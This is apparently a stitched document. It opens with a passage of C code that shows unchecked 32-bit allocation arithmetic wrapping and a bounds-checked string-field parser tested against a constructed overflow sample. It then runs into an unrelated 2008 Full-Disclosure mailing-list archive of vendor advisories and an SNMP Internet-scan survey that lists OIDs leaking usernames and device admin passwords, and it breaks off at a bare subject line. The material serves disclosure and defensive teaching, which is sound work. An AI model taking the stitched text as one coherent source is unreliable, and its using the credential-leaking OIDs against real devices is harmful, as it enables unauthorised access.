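#define SIZE_REJECTED  ((size_t)-1)

/* The unchecked 32-bit arithmetic the advisories describe: both results wrap. */
uint32_t naive_string_alloc(uint32_t len)                 { return len + 1u; }
uint32_t naive_array_alloc(uint32_t count, uint32_t elem) { return count * elem; }

/* Checked array size: every entry must be present in the bytes actually
 * received, so count * elem is bounded by `remaining` and cannot wrap. */
size_t checked_array_alloc(uint32_t count, size_t elem, size_t remaining)
{
    if (elem == 0 || count > remaining / elem)
        return SIZE_REJECTED;
    return (size_t)count * elem;
}

static uint32_t rd32(const uint8_t *p)          /* big-endian: an assumption */
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Parse one string field laid out as [len:4][padded:4][padded data bytes].
 * Assumed rule: padded is a multiple of 8 and at least len.
 * Returns a NUL-terminated heap copy, or NULL when the field is rejected. */
char *parse_string_field(const uint8_t *pkt, size_t pktlen, size_t *consumed)
{
    if (pktlen < 8)
        return NULL;
    uint32_t len = rd32(pkt);
    uint32_t padded = rd32(pkt + 4);

    if (len > MAX_STRING_LEN)                   /* 0xffffffff stops here, before len + 1 */
        return NULL;
    if (padded % 8 != 0 || padded < len || padded > pktlen - 8)
        return NULL;

    char *s = malloc((size_t)len + 1);
    if (s == NULL)
        return NULL;                            /* drop this request, keep serving */
    memcpy(s, pkt + 8, len);                    /* copy the validated len, not padded */
    s[len] = '\0';
    *consumed = 8 + (size_t)padded;
    return s;
}

/* Constructed sample fields (not captured traffic). */
static const uint8_t SAMPLE_OK[] = {
    0, 0, 0, 5,  0, 0, 0, 8,  'a', 'g', 'e', 'n', 't', 0, 0, 0 };
static const uint8_t SAMPLE_WRAP[] = {
    0xff, 0xff, 0xff, 0xff,  0, 0, 0, 8,  'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A' };

/* 1 if the well-formed sample parses to "agent" and consumes all 16 bytes. */
int sample_ok_parses(void)
{
    size_t used = 0;
    char *s = parse_string_field(SAMPLE_OK, sizeof SAMPLE_OK, &used);
    int ok = s != NULL && strcmp(s, "agent") == 0 && used == sizeof SAMPLE_OK;
    free(s);
    return ok;
}

/* 1 if the sample whose length field is 0xffffffff is rejected. */
int sample_wrap_rejected(void)
{
    size_t used = 0;
    char *s = parse_string_field(SAMPLE_WRAP, sizeof SAMPLE_WRAP, &used);
    int rejected = (s == NULL);
    free(s);
    return rejected;
}

int main(void)
{
    printf("naive len+1 for 0xffffffff      -> %u bytes\n",
           (unsigned)naive_string_alloc(0xffffffffu));
    printf("naive 0x20000000 * 8            -> %u bytes\n",
           (unsigned)naive_array_alloc(0x20000000u, 8));
    printf("naive 0x15555556 * 12           -> %u bytes\n",
           (unsigned)naive_array_alloc(0x15555556u, 12));
    printf("checked 0x20000000 * 8 rejected -> %d\n",
           checked_array_alloc(0x20000000u, 8, 64) == SIZE_REJECTED);
    printf("well-formed string parses       -> %d\n", sample_ok_parses());
    printf("0xffffffff string rejected      -> %d\n", sample_wrap_rejected());
    return 0;
}
```

Returning NULL on allocation failure instead of terminating also covers the secondary issue in the Smart Agent advisory, where a client-specified size that cannot be allocated stops the server.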
From seth at airscanner.com Mon Mar 3 19:40:13 2008
From: seth at airscanner.com (Seth Fogie)
Date: Mon, 03 Mar 2008 14:40:13 -0500
Subject: [Full-disclosure] Airscanner Mobile Security Advisory #07122001: Eye-Fi Multiple Vulnerabilities
Message-ID: <47CC541D.1020705@airscanner.com>

Airscanner Mobile Security Advisory #07122001: Eye-Fi Solution Multiple Vulnerabilities

Product: Eye-Fi 1.1.2

Platform: NA

Requirements: NA

Credits:
Seth Fogie
Airscanner Mobile Security
http://www.airscanner.com
December 20, 2007

Risk Level: Medium - Spoofed image injection, redirection of uploaded content, remote DoS of Eye-Fi service.

Summary: The Eye-Fi is an instant solution to add wireless upload capability to any digital camera that supports an SD card. In the version of software tested, the solution has numerous vulnerabilities that can allow unauthorized image uploads to a PC, remotely altering the destination folder, remote crashing of the Eye-Fi service, and more.

Details: Details on this program and the vulnerabilities are located at:
http://www.informit.com/articles/article.aspx?p=1174944
http://www.informit.com/articles/article.aspx?p=1177111

Vendor Response: Vendor has released updated software for both the Eye-Fi software package and the SD card (firmware update).

Copyright (c) 2008 Airscanner Corp.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of Airscanner Corp. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please contact Airscanner Corp. for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use on an AS IS condition. There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

From py at gentoo.org Mon Mar 3 21:42:05 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Mon, 03 Mar 2008 22:42:05 +0100
Subject: [Full-disclosure] [ GLSA 200803-04 ] Mantis: Cross-Site Scripting
Message-ID: <47CC70AD.1050405@gentoo.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200803-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: Mantis: Cross-Site Scripting
      Date: March 03, 2008
      Bugs: #203791
        ID: 200803-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A persistent Cross-Site Scripting vulnerability has been discovered in Mantis.

Background
==========

Mantis is a web-based bug tracking system.

Affected packages
=================

    -------------------------------------------------------------------
     Package             /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  www-apps/mantisbt      < 1.0.8-r1                      >= 1.0.8-r1

Description
===========

seiji reported that the filename for the uploaded file in bug_report.php is not properly sanitised before being stored.

Impact
======

A remote attacker could upload a file with a specially crafted to a bug report, resulting in the execution of arbitrary HTML and script code within the context of the user's browser. Note that this vulnerability is only exploitable by authenticated users.

Workaround
==========

There is no known workaround at this time.
Resolution
==========

All Mantis users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-apps/mantisbt-1.0.8-r1"

References
==========

  [ 1 ] CVE-2007-6611
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6611

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-04.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHzHCtuhJ+ozIKI5gRAnPeAJ4jT1zqcc/xxiGeF3pfMzi/yZznvgCgolXY
mo0mgPPgKLcwm2vE4h7kOKY=
=6gN6
-----END PGP SIGNATURE-----

From py at gentoo.org Mon Mar 3 21:48:59 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Mon, 03 Mar 2008 22:48:59 +0100
Subject: [Full-disclosure] [ GLSA 200803-05 ] SplitVT: Privilege escalation
Message-ID: <47CC724B.9070307@gentoo.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200803-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: SplitVT: Privilege escalation
      Date: March 03, 2008
      Bugs: #211240
        ID: 200803-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability in SplitVT may allow local users to gain escalated privileges.

Background
==========

SplitVT is a program for splitting terminals into two shells.

Affected packages
=================

    -------------------------------------------------------------------
     Package            /  Vulnerable  /                    Unaffected
    -------------------------------------------------------------------
  1  app-misc/splitvt      < 1.6.6-r1                       >= 1.6.6-r1

Description
===========

Mike Ashton reported that SplitVT does not drop group privileges before executing the xprop utility.

Impact
======

A local attacker could exploit this vulnerability to gain the "utmp" group privileges.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All SplitVT users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-misc/splitvt-1.6.6-r1"

References
==========

  [ 1 ] CVE-2008-0162
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0162

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-05.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHzHJLuhJ+ozIKI5gRApfjAJ0SqPZ79ALH6HMJfGAzt65BH+9OFwCfVWco
bS6neubcIpIPKnzy7sOnjE0=
=KoEB
-----END PGP SIGNATURE-----

From py at gentoo.org Mon Mar 3 22:00:10 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Mon, 03 Mar 2008 23:00:10 +0100
Subject: [Full-disclosure] [ GLSA 200803-06 ] SWORD: Shell command injection
Message-ID: <47CC74EA.40401@gentoo.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200803-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: SWORD: Shell command injection
      Date: March 03, 2008
      Bugs: #210754
        ID: 200803-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Insufficient input checking in SWORD may allow shell command injection.

Background
==========

SWORD is a library for Bible study software.

Affected packages
=================

    -------------------------------------------------------------------
     Package         /  Vulnerable  /                       Unaffected
    -------------------------------------------------------------------
  1  app-text/sword      < 1.5.8-r2                         >= 1.5.8-r2

Description
===========

Dan Dennison reported that the diatheke.pl script used in SWORD does not properly sanitize shell meta-characters in the "range" parameter before processing it.

Impact
======

A remote attacker could provide specially crafted input to a vulnerable application, possibly resulting in the remote execution of arbitrary shell commands with the privileges of the user running SWORD (generally the web server account).

Workaround
==========

There is no known workaround at this time.
Resolution
==========

All SWORD users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-text/sword-1.5.8-r2"

References
==========

  [ 1 ] CVE-2008-0932
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0932

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-06.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHzHTpuhJ+ozIKI5gRAmOTAJ93/DdAiuRV8JbRq/phHYIzTomn4wCfYaJT
cEFjYtpok7uJPUNj8t52thY=
=h+WR
-----END PGP SIGNATURE-----

From skx at debian.org Mon Mar 3 21:14:41 2008
From: skx at debian.org (Steve Kemp)
Date: Mon, 3 Mar 2008 21:14:41 +0000
Subject: [Full-disclosure] [SECURITY] [DSA 1511-1] New libicu packages fix multiple problems
Message-ID: <20080303211441.GA5912@steve.org.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1511-1                  security at debian.org
http://www.debian.org/security/                               Steve Kemp
March 03, 2008                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : libicu
Vulnerability  : various
Problem type   : local
Debian-specific: no
CVE Id(s)      : 2007-4770 2007-4771
Debian Bug     : 463688

Several local vulnerabilities have
been discovered in libicu, International Components for Unicode. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2007-4770

    libicu in International Components for Unicode (ICU) 3.8.1 and earlier attempts to process backreferences to the nonexistent capture group zero (aka \0), which might allow context-dependent attackers to read from, or write to, out-of-bounds memory locations, related to corruption of REStackFrames.

CVE-2007-4771

    Heap-based buffer overflow in the doInterval function in regexcmp.cpp in libicu in International Components for Unicode (ICU) 3.8.1 and earlier allows context-dependent attackers to cause a denial of service (memory consumption) and possibly have unspecified other impact via a regular expression that writes a large amount of data to the backtracking stack.

For the stable distribution (etch), these problems have been fixed in version 3.6-2etch1.

For the unstable distribution (sid), these problems have been fixed in version 3.8-6.

We recommend that you upgrade your libicu package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.
Debian GNU/Linux 4.0 alias etch
- -------------------------------

These files will probably be moved into the stable distribution on its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHzGoFwM/Gs81MDZ0RApgrAJ9Jd4cpLRAJ7WTQAnnpd8d4K3/mvwCeNusV
OLKQ6zeO2ePgNnldMI08TRU=
=ay/5
-----END PGP SIGNATURE-----

From py at gentoo.org Mon Mar 3 22:11:00 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Mon, 03 Mar 2008 23:11:00 +0100
Subject: [Full-disclosure] [ GLSA 200803-07 ] Paramiko: Information disclosure
Message-ID: <47CC7774.9090008@gentoo.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200803-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: Paramiko: Information disclosure
      Date: March 03, 2008
      Bugs: #205777
        ID: 200803-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Unsafe randomness usage in Paramiko may allow access to sensitive information.

Background
==========

Paramiko is a Secure Shell Server implementation written in Python.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  dev-python/paramiko       < 1.7.2                         >= 1.7.2

Description
===========

Dwayne C. Litzenberger reported that the file "common.py" does not properly use RandomPool when using threads or forked processes.
Impact
======

A remote attacker could predict the values generated by applications using Paramiko for encryption purposes, potentially gaining access to sensitive information.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Paramiko users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-python/paramiko-1.7.2"

References
==========

  [ 1 ] CVE-2008-0299
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0299

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-07.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHzHd0uhJ+ozIKI5gRAg0QAJ43W26KJoUkLj/zCCTJk8hcMNCWWACdG2Bm
IO5CIH1vE/Ts0MrtKNEcbMI=
=YoSJ
-----END PGP SIGNATURE-----

From security at mandriva.com Mon Mar 3 21:57:37 2008
From: security at mandriva.com (security at mandriva.com)
Date: Mon, 03 Mar 2008 14:57:37 -0700
Subject: [Full-disclosure] [ MDVSA-2008:057 ] - Updated wireshark packages fix denial of service vulnerabilities
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2008:057
http://www.mandriva.com/security/
_______________________________________________________________________

Package : wireshark
Date    : March 3, 2008
Affected: 2007.0, 2007.1, 2008.0, Corporate 4.0
_______________________________________________________________________

Problem Description:

A few vulnerabilities were found in Wireshark, that could cause it to crash or consume excessive memory under certain conditions.

This update provides Wireshark 0.99.8 which is not vulnerable to the issues.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1070
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1071
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1072
http://www.wireshark.org/security/wnpa-sec-2008-01.html
_______________________________________________________________________

Updated Packages:

_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (GNU/Linux)

iD8DBQFHzEjrmqjQ0CJFipgRAvKzAKDq0ngyIBmNw/N9CMWTErMPKHkZHgCgrxf8
2qQSOFnaqHWoU3xidm0MKcE=
=+zG8
-----END PGP SIGNATURE-----

From security at vmware.com Mon Mar 3 22:10:58 2008
From: security at vmware.com (VMware Security team)
Date: Mon, 03 Mar 2008 14:10:58 -0800
Subject: [Full-disclosure] VMSA-2008-0004 Low: Updated e2fsprogs service console package
Message-ID: <47CC7772.8030509@vmware.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

- -------------------------------------------------------------------
                   VMware Security Advisory

Advisory ID:       VMSA-2008-0004
Synopsis:          Low: Updated e2fsprogs service console package
Issue date:        2008-03-03
Updated on:        2008-03-03 (initial release of advisory)
CVE numbers:       CVE-2007-5497
- -------------------------------------------------------------------

1.
Summary:

   Updated service console package e2fsprogs.

2. Relevant releases:

   ESX Server 2.5.5 Upgrade Patch 5
   ESX Server 2.5.4 Upgrade Patch 16

   NOTE: ESX 2.5.4 is in Extended Support and its end of support (Security
         and Bug fixes) is 10/08/2008. Users should plan to upgrade to at
         least 2.5.5 and preferably the newest release available before
         the end of extended support.

         ESX Server prior to 2.5.4 are no longer in Extended Support.
         Users should upgrade to a supported version of the product.

         The VMware Infrastructure Support Life Cycle Policy can be found
         here: http://www.vmware.com/support/policies/eos_vi.html

3. Problem description:

   Updated e2fsprogs package addresses multiple integer overflow flaws.

   Thanks to Rafal Wojtczuk of McAfee Avert Research for identifying and reporting this issue.

   The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2007-5497 to this issue.

4. Solution:

   Please review the Patch notes for your product and version and verify the md5sum of your downloaded file.

   ESX Server 2.x Patches:
   http://www.vmware.com/download/esx/esx2_patches.html

   ESX Server 2.5.5 Upgrade Patch 5
   http://download3.vmware.com/software/esx/esx-2.5.5-73417-upgrade.tar.gz
   md5sum: cf0addac42cb2057c47065971f56bee6
   http://www.vmware.com/support/esx25/doc/esx-255-200802-patch.html

   ESX Server 2.5.4 Upgrade Patch 16
   http://download3.vmware.com/software/esx/esx-2.5.4-73416-upgrade.tar.gz
   md5sum: b7b2cbfd45380124c128831dca8bc2b0
   http://www.vmware.com/support/esx25/doc/esx-254-200802-patch.html

5. References:

   CVE numbers
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5497

- -------------------------------------------------------------------
6.
Contact:

E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  * security-announce at lists.vmware.com
  * bugtraq at securityfocus.com
  * full-disclosure at lists.grok.org.uk

E-mail: security at vmware.com

Security web site
http://www.vmware.com/security

VMware security response policy
http://www.vmware.com/support/policies/security_response.html

General support life cycle policy
http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html

Copyright 2008 VMware Inc. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFHzHdoS2KysvBH1xkRCCxrAJsHDTczV7agRyav5nMXgVmvMKTsSACfTmLl
Rv1wQy510KaPTQy9LiNMTNo=
=yM44
-----END PGP SIGNATURE-----

From unknown.pentester at gmail.com Tue Mar 4 00:02:25 2008
From: unknown.pentester at gmail.com (Adrian P)
Date: Tue, 4 Mar 2008 00:02:25 +0000
Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
Message-ID:

* Exploring the UNKNOWN: Scanning the Internet via SNMP! *

http://www.gnucitizen.org/blog/exploring-the-unknown-scanning-the-internet-via-snmp/

Hacking is not only about coming up with interesting solutions to problems, but also about exploring the unknown. It was this drive for knowledge philosophy that led to surveying a significant sample of the Internet which allowed us to make some VERY interesting observations and get an idea of the current state of _remote SNMP hacking_.

* Why SNMP? *

2.5 million random IP addresses were surveyed via SNMP. Why SNMP you might be asking? Well, there are several reasons. First of all SNMP is a UDP-based protocol which allows us to perform scanning at a much shorter time than via TCP-based protocols. Another advantage of UDP-based protocols is that the source IP address can be spoofed easily.
In the case of SNMP, it means that an attacker could change
configuration settings from a spoofed IP address provided that a valid
write community string is identified or cracked. Needless to say,
changing config settings via SNMP can lead to a full compromise.

Finally, we have been very involved [1] researching embedded devices
lately, and since a significant amount of Internet devices are hackable
via SNMP, such protocol was an obvious candidate.

* When SNMP read access is all we need for successful pwnage *

Gaining SNMP write access is of course usually considered to be a more
serious issue than gaining SNMP read access only. However, even if a
cracker only gained read access to a device/server via a SNMP community
string, sometimes it would be possible to extract sensitive information
such as usernames and passwords which would eventually lead to a
compromise of the targeted systems. In order to accomplish this, all
that is needed by the attacker is knowledge of an interesting OID to
query. My point is that SNMP read access could be enough to fully own a
device!

* Examples of juicy leaks via SNMP read access *

For instance, Windows servers return the full list of usernames [2] by
snmpwalking the OID 1.3.6.1.4.1.77.1.2.25. Or how about the BT Voyager
2000 router leaking the ISP credentials [3] including the password? Oh,
wait, I almost forgot to mention HP JetDirect printers leaking [4] the
admin password [5] via SNMP read access (using OIDs
.iso.3.6.1.4.1.11.2.3.9.4.2.1.3.9.1.1.0 and
.1.3.6.1.4.1.11.2.3.9.1.1.13.0). And of course the recently disclosed
[6] Dynamic DNS credentials disclosure on ZyXEL Prestige routers via
the OID 1.3.6.1.4.1.890.1.2.1.2.6.0 (see section 2.2 in the paper for
more details).

You get the point: lots of devices leak _way too much information_ via
SNMP read access.

* The juicy survey stats! *

From a total number of 2.5 million random IP addresses, 5320 IP
addresses responded to the submitted SNMP requests.
Although this is only 0.2128% of all the IP addresses, we need to keep
in mind that most Internet systems with SNMP support correspond to
embedded devices, which only make a small portion of the Internet.

One query was sent to each random IP using the community string
"public", which is often used as the default read community string. The
OID queried on each request is 1.3.6.1.2.1.1.1.0 which is the system
description (usually returns brand and model). The destination port
used was 161/UDP. Although some systems used different default port
numbers for SNMP daemons, 161 is definitely the most common one.

In order to protect the innocent, we hid the first two octets of the IP
addresses included in our results CSV file:

  cat ./2dot5million-random-ips.csv | while read line
  do
    echo -en '*.*.'>>./2dot5million-random-ips.hidden.csv;
    echo $line | cut -d "." -f 3- >> ./2dot5million-random-ips.hidden.csv
  done

The most common systems found were the following:

* ARRIS Touchstone Telephony Modems [7] - these VoIP modems alone made
  more than 35% of all found devices discovered!
* Cisco routers
* Apple AirPort [8] and Base Station
* ZyXEL Prestige routers
* Netopia routers
* Windows 2000 servers

Obviously, what kind of SNMP-enabled devices are the most popular on
the Internet is very interesting information from a research point of
view. For instance, if researching remote SNMP vulnerabilities, it
would make sense to focus on a type of device that is widely-spread
through the Internet.

I'll leave you guys to make your own observations by reading the
results CSV file.
The survey results file can be found on:

http://www.gnucitizen.org/blog/exploring-the-unknown-scanning-the-internet-via-snmp/

* References *

[1] http://www.google.com/search?num=100&hl=en&q=site%3Agnucitizen.org+%28embedded+devices%29+OR+upnp&btnG=Search
[2] http://insecure.org/sploits/NT.smnp.domain_users.record_deletion.html
[3] http://www.securityfocus.com/archive/1/366780
[4] http://www.phenoelit-us.org/stuff/HP_snmp.txt
[5] http://www.securityfocus.com/bid/7001/exploit
[6] http://www.procheckup.com/Hacking_ZyXEL_Gateways.pdf
[7] http://www.arrisi.com/products/touchstone/index.asp
[8] http://www.apple.com/airportexpress/

--
Adrian "pagvac" Pastor | gnucitizen.org

From krahmer at suse.de Tue Mar 4 08:53:55 2008
From: krahmer at suse.de (Sebastian Krahmer)
Date: Tue, 4 Mar 2008 09:53:55 +0100
Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
In-Reply-To:
References:
Message-ID: <20080304085355.GA19264@suse.de>

On Tue, Mar 04, 2008 at 12:02:25AM +0000, Adrian P wrote:

> * Exploring the UNKNOWN: Scanning the Internet via SNMP! *
> http://www.gnucitizen.org/blog/exploring-the-unknown-scanning-the-internet-via-snmp/
>
> Hacking is not only about coming up with interesting solutions to
> problems, but also about exploring the unknown. It was this drive for
> knowledge philosophy that lead to surveying a significant sample of
> the Internet which allowed us to make some VERY interesting
> observations and get an idea of the current state of _remote SNMP
> hacking_.
>
> * Why SNMP? *
>
> 2.5 million random IP addresses were surveyed via SNMP. Why SNMP you
> might be asking? Well, there are several reasons. First of all SNMP is
> a UDP-based protocol which allows us to perform scanning at a much
> shorter time than via TCP-based protocols. Another advantage of

This is not true. I doubt there is any measurable advantage
of UDP vs. TCP scans if you do it right.
2.5 million addresses can be done in a very short coffee break.
Sebastian

--
~
~ perl self.pl
~ $_='print"\$_=\47$_\47;eval"';eval
~ krahmer at suse.de - SuSE Security Team
~ SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)

From unknown.pentester at gmail.com Tue Mar 4 14:54:36 2008
From: unknown.pentester at gmail.com (Adrian P)
Date: Tue, 4 Mar 2008 14:54:36 +0000
Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
In-Reply-To: <20080304085355.GA19264@suse.de>
References: <20080304085355.GA19264@suse.de>
Message-ID:

Well, such statement is simply derived from my personal experience of
doing application-layer UDP scanning. Never ran a proper benchmark to
compare speed results to be honest.

On Tue, Mar 4, 2008 at 8:53 AM, Sebastian Krahmer wrote:
> On Tue, Mar 04, 2008 at 12:02:25AM +0000, Adrian P wrote:
>
> > * Exploring the UNKNOWN: Scanning the Internet via SNMP! *
> > http://www.gnucitizen.org/blog/exploring-the-unknown-scanning-the-internet-via-snmp/
> >
> > Hacking is not only about coming up with interesting solutions to
> > problems, but also about exploring the unknown. It was this drive for
> > knowledge philosophy that lead to surveying a significant sample of
> > the Internet which allowed us to make some VERY interesting
> > observations and get an idea of the current state of _remote SNMP
> > hacking_.
> >
> > * Why SNMP? *
> >
> > 2.5 million random IP addresses were surveyed via SNMP. Why SNMP you
> > might be asking? Well, there are several reasons. First of all SNMP is
> > a UDP-based protocol which allows us to perform scanning at a much
> > shorter time than via TCP-based protocols. Another advantage of
> This is not true. I doubt there is any measurable advantage
> of UDP vs. TCP scans if you do it right.
> 2.5 million addresses can be done in a very short coffee break.
>
> Sebastian
>
>
> --
> ~
> ~ perl self.pl
> ~ $_='print"\$_=\47$_\47;eval"';eval
> ~ krahmer at suse.de - SuSE Security Team
> ~ SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)
>
>

--
pagvac | gnucitizen.org

From pdp.gnucitizen at googlemail.com Tue Mar 4 17:07:56 2008
From: pdp.gnucitizen at googlemail.com (Petko D. Petkov)
Date: Tue, 4 Mar 2008 17:07:56 +0000
Subject: [Full-disclosure] like goolag but online
